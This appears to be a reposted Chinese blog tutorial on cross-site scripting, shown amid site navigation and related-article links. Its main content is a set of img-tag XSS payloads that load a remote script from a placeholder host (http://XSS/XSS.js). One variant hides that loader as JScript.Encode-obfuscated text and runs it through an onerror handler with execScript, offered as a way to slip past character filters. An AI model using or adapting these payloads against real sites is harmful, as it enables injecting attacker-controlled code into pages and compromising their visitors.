1. 首页
  2. 文章中心
  3. 安全教程

教你如何在XSS中再插JS

165 阅读 0 评论
我是靠谱客的博主 微笑手链,最近开发中收集的这篇文章主要介绍教你如何在XSS中再插JS ,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img> 字符过滤怎么办?用Encode加密后就无敌了~ 未加密前:
<img src='#' XSS="try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}" onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" > 加密后:
<img src='#' XSS="#@~^bQAAAA==OMX`7lMP/{NK^Es UYcm.nmY As s xDcv/1DbwOBbIkRdD1xB4YO2=zzpjUzp?U N/vpNKmEs OR(W[Xcl22xN;4k^N`kbI81lDm4`nbP8XCcAAA==^#~@ " onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" > 嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeURI处理一次Encode加密后的代码

最后

以上就是微笑手链为你收集整理的教你如何在XSS中再插JS 的全部内容,希望文章能够帮你解决教你如何在XSS中再插JS 所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(109)

相关文章

网络营销 传统企业用什么连接用户?微信不可能用连接搞
网络营销 传统企业用什么连接用户?微信不可能用连接搞
php基于curl重写file_get_contents函数实例
php基于curl重写file_get_contents函数实例
注意!Win10全面禁用摄像头没用?对Windows Hello无效
注意!Win10全面禁用摄像头没用?对Windows Hello无效
高效利用Angular中内置服务$http、$location等
高效利用Angular中内置服务$http、$location等
教你如何在XSS中再插JS
教你如何在XSS中再插JS
针式打印机纸张的格式大小该怎么设置?
针式打印机纸张的格式大小该怎么设置?
Windows7系统超级终端的添加方法 win7如何添加超级终端
Windows7系统超级终端的添加方法 win7如何添加超级终端
win7系统删除文件提示正在准备再循环的多种解决方法
win7系统删除文件提示正在准备再循环的多种解决方法

评论列表共有 0 条评论

立即
投稿
返回
顶部